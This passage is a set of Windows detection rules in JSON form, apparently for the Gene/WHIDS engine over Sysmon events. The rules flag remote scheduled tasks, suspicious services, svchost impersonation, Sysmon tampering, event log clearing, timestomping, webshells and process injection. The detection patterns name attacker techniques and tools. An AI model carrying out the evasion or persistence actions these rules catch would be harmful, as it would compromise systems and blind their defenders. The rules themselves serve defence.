'(?i:^c:\\\\windows\\\\system32\\\\schtasks\\.exe$)'", 90 | "$create: CommandLine ~= '(?i:/(create|xml))'", 91 | "$remote: CommandLine ~= '(?i:/S )'" 92 | ], 93 | "Condition": "$schtasks and $remote and $create " 94 | } 95 | 96 | { 97 | "Name": "NewSchedTaskInReg", 98 | "Tags": [ 99 | "Registry", 100 | "Autorun", 101 | "ScheduledTasks" 102 | ], 103 | "Meta": { 104 | "Events": { 105 | "Microsoft-Windows-Sysmon/Operational": [ 106 | 13 107 | ] 108 | }, 109 | "Computers": [], 110 | "Criticality": 8, 111 | "ATTACK": [ 112 | { 113 | "ID": "T1053", 114 | "Tactic": "privilege-escalation", 115 | "Reference": "https://attack.mitre.org/techniques/T1053" 116 | } 117 | ], 118 | "Author": "@0xrawsec", 119 | "Comment": "Spot new scheduled task via new registry key", 120 | "Schema": "2.0.0" 121 | }, 122 | "Matches": [ 123 | "$eventtype: EventType = 'SetValue'", 124 | "$newid: TargetObject ~= '(?i:\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\.*?\\\\Id$)'" 125 | ], 126 | "Condition": "$eventtype and $newid" 127 | } 128 | 129 | { 130 | "Name": "NewSchedTaskOnDisk", 131 | "Tags": [ 132 | "ScheduledTasks" 133 | ], 134 | "Meta": { 135 | "Events": { 136 | "Microsoft-Windows-Sysmon/Operational": [ 137 | 11 138 | ] 139 | }, 140 | "Computers": [], 141 | "Criticality": 8, 142 | "ATTACK": [ 143 | { 144 | "ID": "T1053", 145 | "Tactic": "privilege-escalation", 146 | "Reference": "https://attack.mitre.org/techniques/T1053" 147 | } 148 | ], 149 | "Author": "0xrawsec", 150 | "Comments": "New scheduled task created on disk.", 151 | "Schema": "2.0.0" 152 | }, 153 | "Matches": [ 154 | "$target: TargetFilename ~= '(?i:^C:\\\\Windows\\\\Sys(tem32|wow64)\\\\Tasks\\\\)'" 155 | ], 156 | "Condition": "$target" 157 | } 158 | 159 | -------------------------------------------------------------------------------- /rules/services.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SuspiciousService", 3 | "Tags": [ 4 | "SvcHost", 5 | "ImageLoaded", 6 | "Sysmon" 7 | ], 8 | "Meta": { 9 | "Events": { 10 | "Microsoft-Windows-Sysmon/Operational": [ 11 | 1 12 | ] 13 | }, 14 | "Computers": [], 15 | "Criticality": 4, 16 | "Author": "@0xrawsec", 17 | "Comment": "Tries to spot suspicious processes spawned by services.exe", 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [ 21 | "$parent: ParentImage ~= '(?i:C:\\\\Windows\\\\(System32|SysWOW64)\\\\services\\.exe)'", 22 | "$windows: Image ~= '(?i:C:\\\\Windows\\\\)'", 23 | "$programfile: Image ~= '(?i:C:\\\\(PROGRA~2|Program Files.*?)\\\\.*)'" 24 | ], 25 | "Condition": "$parent and !$windows and !$programfile" 26 | } 27 | 28 | { 29 | "Name": "SuspiciousServiceInstallation", 30 | "Tags": [ 31 | "Services", 32 | "Registry", 33 | "Autorun" 34 | ], 35 | "Meta": { 36 | "Events": { 37 | "Microsoft-Windows-Sysmon/Operational": [ 38 | 13 39 | ] 40 | }, 41 | "Computers": [], 42 | "Criticality": 8, 43 | "Author": "@0xrawsec", 44 | "Comment": "Tries to spot suspicious service installation", 45 | "Schema": "2.0.0" 46 | }, 47 | "Matches": [ 48 | "$eventtype: EventType = 'SetValue'", 49 | "$key1: TargetObject ~= '(?i:^HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\.*?\\\\ImagePath$)'", 50 | "$key2: TargetObject ~= '(?i:^HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\.*?\\\\Parameters\\\\ServiceDll$)'", 51 | "$systemroot: Details ~= '(?i:%%SystemRoot%%)'", 52 | "$service: Image ~= '(?i:C:\\\\Windows\\\\system32\\\\services.exe)'" 53 | ], 54 | "Condition": "$eventtype and ($key1 or $key2) and !($systemroot or $service)" 55 | } 56 | 57 | { 58 | "Name": "SuspiciousServiceCreated", 59 | "Tags": [ 60 | "Services" 61 | ], 62 | "Meta": { 63 | "Events": { 64 | "Microsoft-Windows-Sysmon/Operational": [ 65 | 1 66 | ] 67 | }, 68 | "Computers": [], 69 | "Criticality": 7, 70 | "Author": "@0xrawsec", 71 | "Comment": "Spot suspicious service creation", 72 | "Schema": "2.0.0" 73 | }, 74 | "Matches": [ 75 | "$sc: Image ~= '(?i:sc.exe$)'", 76 | "$op: CommandLine ~= '(?i: (create) )'", 77 | "$binpath: CommandLine ~= '?i:(binPath=.*?C:\\\\Windows)'" 78 | ], 79 | "Condition": "$sc and $op and !$binpath" 80 | } 81 | 82 | { 83 | "Name": "ServiceDeletion", 84 | "Tags": [ 85 | "Services" 86 | ], 87 | "Meta": { 88 | "Events": { 89 | "Microsoft-Windows-Sysmon/Operational": [ 90 | 1 91 | ] 92 | }, 93 | "Computers": [], 94 | "Criticality": 3, 95 | "Author": "@0xrawsec", 96 | "Comment": "Spot service deletion", 97 | "Schema": "2.0.0" 98 | }, 99 | "Matches": [ 100 | "$sc: Image ~= '(?i:sc.exe$)'", 101 | "$op: CommandLine ~= '(?i: (delete) )'" 102 | ], 103 | "Condition": "$sc and $op" 104 | } 105 | 106 | -------------------------------------------------------------------------------- /rules/svchost.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SvcHostMimic", 3 | "Tags": [ 4 | "SvcHost", 5 | "Sysmon" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 1 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 7, 15 | "Author": "@0xrawsec", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$im: Image ~= '(?i:\\\\svchost)'", 20 | "$svchost: Image ~= '(?i:c:\\\\windows\\\\sys(tem32|wow64)\\\\svchost.exe$)'" 21 | ], 22 | "Condition": "$im and !$svchost" 23 | } 24 | 25 | { 26 | "Name": "SvcHostBadParent", 27 | "Tags": [ 28 | "SvcHost", 29 | "Heuristics", 30 | "Sysmon" 31 | ], 32 | "Meta": { 33 | "Events": { 34 | "Microsoft-Windows-Sysmon/Operational": [ 35 | 1 36 | ] 37 | }, 38 | "Computers": [], 39 | "Criticality": 7, 40 | "Author": "@0xrawsec", 41 | "Comments": "Wrong svchost parent", 42 | "Schema": "2.0.0" 43 | }, 44 | "Matches": [ 45 | "$svchost: Image ~= '(?i:^c:\\\\windows\\\\sys(tem32|wow64)\\\\svchost\\.exe$)'", 46 | "$pservices: ParentImage ~= '(?i:^C:\\\\Windows\\\\sys(tem32|wow64)\\\\(services|svchost)\\.exe$)'" 47 | ], 48 | "Condition": "$svchost and !$pservices" 49 | } 50 | 51 | { 52 | "Name": "SvcHostImageLoaded", 53 | "Tags": [ 54 | "SvcHost", 55 | "ImageLoaded", 56 | "Sysmon" 57 | ], 58 | "Meta": { 59 | "Events": { 60 | "Microsoft-Windows-Sysmon/Operational": [ 61 | 7 62 | ] 63 | }, 64 | "Computers": [], 65 | "Criticality": 0, 66 | "Author": "@0xrawsec", 67 | "Comment": "Just an informational rule that can be further used to spot weird image loaded", 68 | "Disable": true, 69 | "Schema": "2.0.0" 70 | }, 71 | "Matches": [ 72 | "$im: Image ~= '(?i:C:\\\\Windows\\\\System32\\\\svchost\\.exe)'" 73 | ], 74 | "Condition": "$im" 75 | } 76 | 77 | { 78 | "Name": "SvcHostUnsignedDll", 79 | "Tags": [ 80 | "SvcHost", 81 | "ImageLoaded", 82 | "Sysmon" 83 | ], 84 | "Meta": { 85 | "Events": { 86 | "Microsoft-Windows-Sysmon/Operational": [ 87 | 7 88 | ] 89 | }, 90 | "Computers": [], 91 | "Criticality": 6, 92 | "Author": "@0xrawsec", 93 | "Comment": "Images loaded by svchost and not signed", 94 | "Schema": "2.0.0" 95 | }, 96 | "Matches": [ 97 | "$im: Image ~= '(?i:C:\\\\Windows\\\\System32\\\\svchost\\.exe)'", 98 | "$unsigned: Signed = 'false'" 99 | ], 100 | "Condition": "$im and $unsigned" 101 | } 102 | 103 | { 104 | "Name": "SvcHostUntrustedDLL", 105 | "Tags": [ 106 | "SvcHost", 107 | "ImageLoaded", 108 | "Sysmon" 109 | ], 110 | "Meta": { 111 | "Events": { 112 | "Microsoft-Windows-Sysmon/Operational": [ 113 | 7 114 | ] 115 | }, 116 | "Computers": [], 117 | "Criticality": 7, 118 | "Author": "@0xrawsec", 119 | "Comment": "Images loaded by svchost and not signed by Windows. Needs to be ajusted according to the environment.", 120 | "Schema": "2.0.0" 121 | }, 122 | "Matches": [ 123 | "$im: Image ~= '(?i:C:\\\\Windows\\\\System32\\\\svchost\\.exe)'", 124 | "$trusted: Signature ~= '{{trusted-dll-sig}}'" 125 | ], 126 | "Condition": "$im and !$trusted" 127 | } 128 | 129 | { 130 | "Name": "StopSvchostAccess", 131 | "Tags": [ 132 | "Invoke-Phant0m", 133 | "SvcHost" 134 | ], 135 | "Meta": { 136 | "Events": { 137 | "Microsoft-Windows-Sysmon/Operational": [ 138 | 10 139 | ] 140 | }, 141 | "Computers": [], 142 | "Criticality": 7, 143 | "Comments": "Suspicious Process Access to SvcHost", 144 | "Author": "0xrawsec", 145 | "Schema": "2.0.0" 146 | }, 147 | "Matches": [ 148 | "$svchost: TargetImage ~= '{{bin-svchost}}'", 149 | "$wl: SourceImage ~= '({{bin-av}}|{{bin-sysmon}}|{{bin-system-nr}}|{{bin-wmiprvse}})'", 150 | "$stopresume: GrantedAccess &= '0x0800'", 151 | "$terminate: GrantedAccess &= '0x0001'" 152 | ], 153 | "Condition": "$svchost and ($stopresume or $terminate) and !$wl" 154 | } 155 | 156 | { 157 | "Name": "MaliciousSvchostAccess", 158 | "Tags": [ 159 | "Invoke-Phant0m", 160 | "SvcHost" 161 | ], 162 | "Meta": { 163 | "Events": { 164 | "Microsoft-Windows-Sysmon/Operational": [ 165 | 10 166 | ] 167 | }, 168 | "Computers": [], 169 | "Criticality": 10, 170 | "Comments": "Malicious Process Access to svchost.exe (generated by Invoke-Phant0m)", 171 | "Author": "0xrawsec", 172 | "Schema": "2.0.0" 173 | }, 174 | "Matches": [ 175 | "$ct: CallTrace ~= 'UNKNOWN'", 176 | "$svchost: TargetImage ~= '(?i:windows\\\\sys(tem32|wow64)\\\\svchost\\.exe$)'" 177 | ], 178 | "Condition": "$svchost and $ct" 179 | } 180 | 181 | { 182 | "Name": "SvcHostSuspiciousNetConn", 183 | "Tags": [ 184 | "SvcHost" 185 | ], 186 | "Meta": { 187 | "Events": { 188 | "Microsoft-Windows-Sysmon/Operational": [ 189 | 3 190 | ] 191 | }, 192 | "Computers": [], 193 | "Criticality": 6, 194 | "Comments": "Disabled because of FPs", 195 | "Author": "0xrawsec", 196 | "Disable": true, 197 | "Schema": "2.0.0" 198 | }, 199 | "Matches": [ 200 | "$svchost: Image ~= '(?i:windows\\\\sys(wow64|tem32)\\\\svchost\\.exe$)'", 201 | "$dstbootps: DestinationPortName = 'bootps'", 202 | "$dstldap: DestinationPortName = 'ldap'", 203 | "$dstntp: DestinationPortName = 'ntp'", 204 | "$dstdomain: DestinationPortName = 'domain'", 205 | "$dstepmap: DestinationPortName = 'epmap'", 206 | "$srcbootpc: SourcePortName = 'bootpc'", 207 | "$dstmulticast: DestinationIp ~= '(?i:^(224|23(2|3|4)|239\\.))'", 208 | "$dstlocalhost: DestinationIp = '127.0.0.1'", 209 | "$dstprivip: DestinationIp ~= '{{priv-ipv4}}'", 210 | "$init: Initiated = 'true'" 211 | ], 212 | "Condition": "$svchost and $init and !($dstmulticast or $dstlocalhost) and !($srcbootpc and $dstbootps) and !(($dstldap or $dstntp or $dstdomain or $dstepmap) and $dstprivip)" 213 | } 214 | 215 | -------------------------------------------------------------------------------- /rules/sysmon.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SysmonStateChanged", 3 | "Tags": [ 4 | "Sysmon" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 4 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 8, 14 | "Author": "@0xrawsec", 15 | "Comment": "", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$start: State = 'Started'" 20 | ], 21 | "Condition": "!$start" 22 | } 23 | 24 | { 25 | "Name": "SysmonConfigChanged", 26 | "Tags": [ 27 | "Sysmon" 28 | ], 29 | "Meta": { 30 | "Events": { 31 | "Microsoft-Windows-Sysmon/Operational": [ 32 | 16 33 | ] 34 | }, 35 | "Computers": [], 36 | "Criticality": 8, 37 | "Author": "@0xrawsec", 38 | "Comment": "", 39 | "Schema": "2.0.0" 40 | }, 41 | "Matches": [], 42 | "Condition": "" 43 | } 44 | 45 | { 46 | "Name": "SysmonFingerprinting", 47 | "Tags": [ 48 | "Sysmon" 49 | ], 50 | "Meta": { 51 | "Events": { 52 | "Microsoft-Windows-Sysmon/Operational": [ 53 | 1 54 | ] 55 | }, 56 | "Computers": [], 57 | "Criticality": 6, 58 | "Author": "@0xrawsec", 59 | "Comment": "Experimental rules to catch Sysmon configuration enumeration via Sysmon executable", 60 | "Schema": "2.0.0" 61 | }, 62 | "Matches": [ 63 | "$sysmon: Product = 'Sysinternals Sysmon'", 64 | "$sysmonim: Image ~= '(?i:C:\\\\Windows\\\\.*sysmon.*)'", 65 | "$arg: CommandLine ~= '(?i:\\s-c\\s*$)'" 66 | ], 67 | "Condition": "($sysmon or $sysmonim) and $arg" 68 | } 69 | 70 | { 71 | "Name": "SysmonRegFingerprinting", 72 | "Tags": [ 73 | "Sysmon" 74 | ], 75 | "Meta": { 76 | "Events": { 77 | "Microsoft-Windows-Sysmon/Operational": [ 78 | 12 79 | ] 80 | }, 81 | "Computers": [], 82 | "Criticality": 7, 83 | "Author": "@0xrawsec", 84 | "Comment": "Experimental rule to catch sysmon config fingerprinting in registry by another process than sysmon itself", 85 | "Schema": "2.0.0" 86 | }, 87 | "Matches": [ 88 | "$create: EventType = 'CreateKey'", 89 | "$sysmon: Image ~= '(?i:C:\\\\Windows\\\\Sysmon.exe)'", 90 | "$target: TargetObject ~= '(?i:^HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\SysmonDrv\\\\Parameters)'" 91 | ], 92 | "Condition": "$target and $create and !$sysmon" 93 | } 94 | 95 | { 96 | "Name": "SysmonConfigTampering", 97 | "Tags": [ 98 | "Sysmon" 99 | ], 100 | "Meta": { 101 | "Events": { 102 | "Microsoft-Windows-Sysmon/Operational": [ 103 | 12, 104 | 13 105 | ] 106 | }, 107 | "Computers": [], 108 | "Criticality": 10, 109 | "Author": "@0xrawsec", 110 | "Comment": "Experimental rule to catch sysmon config tampering by another process than sysmon itself ", 111 | "Schema": "2.0.0" 112 | }, 113 | "Matches": [ 114 | "$set: EventType = 'SetValue'", 115 | "$del: EventType = 'DeleteValue'", 116 | "$sysmon: Image ~= '(?i:C:\\\\Windows\\\\Sysmon.exe)'", 117 | "$target: TargetObject ~= '(?i:HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\SysmonDrv\\\\Parameters\\\\(Options|HashingAlgorithm|Rules))'" 118 | ], 119 | "Condition": "$target and ($set or $del) and !$sysmon" 120 | } 121 | 122 | -------------------------------------------------------------------------------- /rules/timestomp.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ExecTimestomping", 3 | "Tags": [ 4 | "Timestomp" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 2 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 6, 14 | "Author": "@0xrawsec", 15 | "Comment": "", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$exec: TargetFilename ~= '(?i:({{script-exts}}|{{exec-exts}}))'", 20 | "$wl1: TargetFilename ~= '(?i:^C:\\\\Users\\\\.*?\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\CustomDestinations)\\\\[A-Z0-9]{20}.temp$'", 21 | "$wl2: TargetFilename ~= '(?i:.*~tmp$)'", 22 | "$wl3: TargetFilename ~= '(?i:C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\)'" 23 | ], 24 | "Condition": "$exec and !($wl1 or $wl2 or $wl3)" 25 | } 26 | 27 | -------------------------------------------------------------------------------- /rules/tools.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SystemInfo.exe", 3 | "Tags": [ 4 | "Tool" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 2, 14 | "Author": "0xrawsec", 15 | "Comment": "SystemInfo execution", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$exe: Image ~= '(?i:\\\\systeminfo\\.exe$)'" 20 | ], 21 | "Condition": "$exe" 22 | } 23 | 24 | { 25 | "Name": "Tasklist.exe", 26 | "Tags": [ 27 | "Tool" 28 | ], 29 | "Meta": { 30 | "Events": { 31 | "Microsoft-Windows-Sysmon/Operational": [ 32 | 1 33 | ] 34 | }, 35 | "Computers": [], 36 | "Criticality": 2, 37 | "Author": "0xrawsec", 38 | "Comment": "Tasklist execution", 39 | "Schema": "2.0.0" 40 | }, 41 | "Matches": [ 42 | "$exe: Image ~= '(?i:\\\\tasklist\\.exe$)'" 43 | ], 44 | "Condition": "$exe" 45 | } 46 | 47 | { 48 | "Name": "Xcopy.exe", 49 | "Tags": [ 50 | "Tool" 51 | ], 52 | "Meta": { 53 | "Events": { 54 | "Microsoft-Windows-Sysmon/Operational": [ 55 | 1 56 | ] 57 | }, 58 | "Computers": [], 59 | "Criticality": 2, 60 | "Author": "0xrawsec", 61 | "Comment": "xcopy execution", 62 | "Schema": "2.0.0" 63 | }, 64 | "Matches": [ 65 | "$exe: Image ~= '(?i:\\\\xcopy\\.exe$)'" 66 | ], 67 | "Condition": "$exe" 68 | } 69 | 70 | { 71 | "Name": "Net.exe", 72 | "Tags": [ 73 | "Tool" 74 | ], 75 | "Meta": { 76 | "Events": { 77 | "Microsoft-Windows-Sysmon/Operational": [ 78 | 1 79 | ] 80 | }, 81 | "Computers": [], 82 | "Criticality": 2, 83 | "Author": "0xrawsec", 84 | "Comment": "net.exe execution", 85 | "Schema": "2.0.0" 86 | }, 87 | "Matches": [ 88 | "$exe: Image ~= '(?i:\\\\net1?\\.exe$)'" 89 | ], 90 | "Condition": "$exe" 91 | } 92 | 93 | { 94 | "Name": "Taskkill.exe", 95 | "Tags": [ 96 | "Tool" 97 | ], 98 | "Meta": { 99 | "Events": { 100 | "Microsoft-Windows-Sysmon/Operational": [ 101 | 1 102 | ] 103 | }, 104 | "Computers": [], 105 | "Criticality": 2, 106 | "Author": "0xrawsec", 107 | "Comment": "taskkill.exe execution", 108 | "Schema": "2.0.0" 109 | }, 110 | "Matches": [ 111 | "$exe: Image ~= '(?i:\\\\taskkill\\.exe$)'" 112 | ], 113 | "Condition": "$exe" 114 | } 115 | 116 | { 117 | "Name": "Reg.exe", 118 | "Tags": [ 119 | "Tool" 120 | ], 121 | "Meta": { 122 | "Events": { 123 | "Microsoft-Windows-Sysmon/Operational": [ 124 | 1 125 | ] 126 | }, 127 | "Computers": [], 128 | "Criticality": 2, 129 | "Author": "0xrawsec", 130 | "Comment": "reg.exe execution", 131 | "Schema": "2.0.0" 132 | }, 133 | "Matches": [ 134 | "$exe: Image ~= '(?i:\\\\reg\\.exe$)'" 135 | ], 136 | "Condition": "$exe" 137 | } 138 | 139 | { 140 | "Name": "Ping.exe", 141 | "Tags": [ 142 | "Tool" 143 | ], 144 | "Meta": { 145 | "Events": { 146 | "Microsoft-Windows-Sysmon/Operational": [ 147 | 1 148 | ] 149 | }, 150 | "Computers": [], 151 | "Criticality": 2, 152 | "Author": "0xrawsec", 153 | "Comment": "ping.exe execution", 154 | "Schema": "2.0.0" 155 | }, 156 | "Matches": [ 157 | "$exe: Image ~= '(?i:\\\\ping\\.exe$)'" 158 | ], 159 | "Condition": "$exe" 160 | } 161 | 162 | { 163 | "Name": "Nbtstat.exe", 164 | "Tags": [ 165 | "Tool" 166 | ], 167 | "Meta": { 168 | "Events": { 169 | "Microsoft-Windows-Sysmon/Operational": [ 170 | 1 171 | ] 172 | }, 173 | "Computers": [], 174 | "Criticality": 2, 175 | "Author": "0xrawsec", 176 | "Comment": "Nbtstat.exe execution", 177 | "Schema": "2.0.0" 178 | }, 179 | "Matches": [ 180 | "$exe: Image ~= '(?i:\\\\nbtstat\\.exe$)'" 181 | ], 182 | "Condition": "$exe" 183 | } 184 | 185 | -------------------------------------------------------------------------------- /rules/wevtutil.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "EventClearing", 3 | "Tags": [ 4 | "PostExploit" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 8, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1070", 17 | "Tactic": "defense-evasion", 18 | "Reference": "https://attack.mitre.org/techniques/T1070" 19 | } 20 | ], 21 | "Author": "@0xrawsec", 22 | "Schema": "2.0.0" 23 | }, 24 | "Matches": [ 25 | "$im: Image ~= '(?i:\\\\wevtutil\\.exe$)'", 26 | "$cmd: CommandLine ~= '(?i: cl | clear-log )'" 27 | ], 28 | "Condition": "$im and $cmd" 29 | } 30 | 31 | { 32 | "Name": "SecurityLogClearing", 33 | "Tags": [ 34 | "PostExploit" 35 | ], 36 | "Meta": { 37 | "Events": { 38 | "Security": [ 39 | 1102 40 | ] 41 | }, 42 | "Computers": [], 43 | "Criticality": 8, 44 | "ATTACK": [ 45 | { 46 | "ID": "T1070", 47 | "Tactic": "defense-evasion", 48 | "Reference": "https://attack.mitre.org/techniques/T1070" 49 | } 50 | ], 51 | "Author": "@0xrawsec", 52 | "Comments": "Catch Security logs clearing event", 53 | "Schema": "2.0.0" 54 | }, 55 | "Matches": [], 56 | "Condition": "" 57 | } 58 | 59 | -------------------------------------------------------------------------------- /rules/whids/README.md: -------------------------------------------------------------------------------- 1 | All the files in here will work only with WHIDS with enrichment (through hooks) being done on the events -------------------------------------------------------------------------------- /rules/whids/cryptolocker.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Cryptolocker", 3 | "Tags": [ 4 | "WHIDS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 11 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 10, 14 | "Author": "0xrawsec", 15 | "Comments": "Experimental rule to catch, kill and blacklist a generic cryptolocker", 16 | "Disable": true, 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$allowed: Image ~= '{{system}}'", 21 | "$empty_ext: Extension = ''", 22 | "$count_by_ext: CountByExt >= '50'" 23 | ], 24 | "Condition": "!$empty_ext and $count_by_ext", 25 | "Actions": [ 26 | "kill", 27 | "blacklist" 28 | ] 29 | } -------------------------------------------------------------------------------- /rules/whids/heuristics.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "HeurMaliciousAccess", 3 | "Tags": [ 4 | "Heuristics", 5 | "WHIDS" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 10 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 8, 15 | "Author": "0xrawsec", 16 | "Comments": "Experimental rule to catch malicious accesses to Windows binaries. This works only with WHIDS and hooks enabled.", 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$ct: CallTrace ~= 'UNKNOWN'", 21 | "$whitelist: SourceImage ~= '(?i:{{system}}(sdiagnhost|svchost)\\.exe)'", 22 | "$windows: TargetImage ~= '(?i:C:\\\\Windows\\\\)'", 23 | "$write: GrantedAccess &= '0x20'", 24 | "$read: GrantedAccess &= '0x10'", 25 | "$srcisparent: SourceProcessGUID = @TargetParentProcessGuid" 26 | ], 27 | "Condition": "!$srcisparent and $windows and $ct and ($write or $read) and !$whitelist" 28 | } 29 | 30 | { 31 | "Name": "HeurPersistentRAT", 32 | "Tags": [ 33 | "Heuristics", 34 | "WHIDS" 35 | ], 36 | "Meta": { 37 | "Events": { 38 | "Microsoft-Windows-Sysmon/Operational": [ 39 | 1 40 | ] 41 | }, 42 | "Computers": [], 43 | "Criticality": 8, 44 | "Author": "@0xrawsec", 45 | "Comments": "Experimental rule to detect some persistent RATs (i.e. interesting tools to monitor being called and not being a descendant process from Explorer.exe, typical of an interactive session)", 46 | "Schema": "2.0.0" 47 | }, 48 | "Matches": [ 49 | "$exist: Ancestors ~= '(?i:^System\\|)'", 50 | "$anc: Ancestors ~= '(?i:C:\\\\Windows\\\\explorer\\.exe)'", 51 | "$schedsvc: ParentServices ~= '^(Schedule|BrokerInfrastructure,DcomLaunch,Power,SystemEventsBroker)$'", 52 | "$tools: Image ~= '{{admintools}}'" 53 | ], 54 | "Condition": "$exist and $tools and !$anc and !$schedsvc" 55 | } 56 | 57 | { 58 | "Name": "HeurOfficeThreat", 59 | "Tags": [ 60 | "Heuristics", 61 | "WHIDS", 62 | "MSOffice" 63 | ], 64 | "Meta": { 65 | "Events": { 66 | "Microsoft-Windows-Sysmon/Operational": [ 67 | 1 68 | ] 69 | }, 70 | "Computers": [], 71 | "Criticality": 10, 72 | "Author": "@0xrawsec", 73 | "Comments": "Generic rule to catch MS Office based malware", 74 | "Schema": "2.0.0" 75 | }, 76 | "Matches": [ 77 | "$anc: Ancestors ~= '{{msoffice}}'", 78 | "$tools: Image ~= '({{execution}}|{{decode}})'" 79 | ], 80 | "Condition": "$tools and $anc" 81 | } 82 | 83 | { 84 | "Name": "HeurWebShell", 85 | "Tags": [ 86 | "Heuristics", 87 | "WHIDS", 88 | "WebShell" 89 | ], 90 | "Meta": { 91 | "Events": { 92 | "Microsoft-Windows-Sysmon/Operational": [ 93 | 1 94 | ] 95 | }, 96 | "Computers": [], 97 | "Criticality": 10, 98 | "Author": "@0xrawsec", 99 | "Comments": "Generic rule to catch webshells", 100 | "Schema": "2.0.0" 101 | }, 102 | "Matches": [ 103 | "$anc: Ancestors ~= '{{webservers}}'", 104 | "$tools: Image ~= '{{admintools}}'" 105 | ], 106 | "Condition": "$tools and $anc" 107 | } 108 | 109 | -------------------------------------------------------------------------------- /rules/whids/injection.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ExplorerInjection", 3 | "Tags": [ 4 | "WHIDS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 10 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 10, 14 | "Author": "0xrawsec", 15 | "Comments": "Attempt to write (inject) into Explorer process. Built up for Windows 10\u00a0might generate some FPs on earlier windows versions.", 16 | "ATTACK": [ 17 | { 18 | "ID": "T1055", 19 | "Tactic": "privilege-escalation", 20 | "Reference": "https://attack.mitre.org/techniques/T1055" 21 | } 22 | ], 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$ga: GrantedAccess &= '0x20'", 27 | "$srcwl: SourceImage ~= '(?i:C:\\\\Windows\\\\System32\\\\(csrss)\\.exe)'", 28 | "$hosted: SourceImage ~= '(?i:\\\\(lsass|svchost)\\.exe$)'", 29 | "$win10shared: SourceServices ~= '{{win10shared}}'", 30 | "$win10svcs: SourceServices ~= '{{win10svcs}}'", 31 | "$sysmon: SourceServices ~= '{{sysmon-svc}}'", 32 | "$expl: TargetImage ~= '(?i:C:\\\\Windows\\\\Explorer\\.exe)'", 33 | "$srcisparent: SourceProcessGUID = @TargetParentProcessGuid" 34 | ], 35 | "Condition": "$ga and $expl and !($srcisparent or ($hosted and $win10shared) or $win10svcs or $sysmon or $srcwl)" 36 | } 37 | 38 | { 39 | "Name": "SuspWriteAccess", 40 | "Tags": [ 41 | "WHIDS" 42 | ], 43 | "Meta": { 44 | "Events": { 45 | "Microsoft-Windows-Sysmon/Operational": [ 46 | 10 47 | ] 48 | }, 49 | "Computers": [], 50 | "Criticality": 8, 51 | "Author": "0xrawsec", 52 | "Comments": "Experimental rule to catch generic process injection (write access to a foreign process without being its parent). Won't catch process hollowing since the parent injects into the child. NB:\u00a0works only in WHIDS", 53 | "ATTACK": [ 54 | { 55 | "ID": "T1055", 56 | "Tactic": "privilege-escalation", 57 | "Reference": "https://attack.mitre.org/techniques/T1055" 58 | } 59 | ], 60 | "Schema": "2.0.0" 61 | }, 62 | "Matches": [ 63 | "$ga: GrantedAccess &= '0x20'", 64 | "$wlsvcs: SourceServices ~= '(?i:({{sysmon-svc}}|Appinfo|PcaSvc|Themes))'", 65 | "$srcwl: SourceImage ~= '(?i:{{system}}(conhost|csrss|lsass)\\.exe)'", 66 | "$trgwl: TargetImage ~= '(?i:{{windows-apps}}(Microsoft\\.MicrosoftOfficeHub_.*?\\\\LocalBridge\\.exe))'", 67 | "$srcisparent: SourceProcessGUID = @TargetParentProcessGuid", 68 | "$srcistarget: SourceImage = @TargetImage", 69 | "$srcissystem: SourceIntegrityLevel = 'System'" 70 | ], 71 | "Condition": "$ga and !($wlsvcs or $srcwl or $trgwl or $srcissystem or $srcisparent or $srcistarget)" 72 | } 73 | 74 | { 75 | "Name": "SuspPrivWriteAccess", 76 | "Tags": [ 77 | "WHIDS" 78 | ], 79 | "Meta": { 80 | "Events": { 81 | "Microsoft-Windows-Sysmon/Operational": [ 82 | 10 83 | ] 84 | }, 85 | "Computers": [], 86 | "Criticality": 8, 87 | "Author": "0xrawsec", 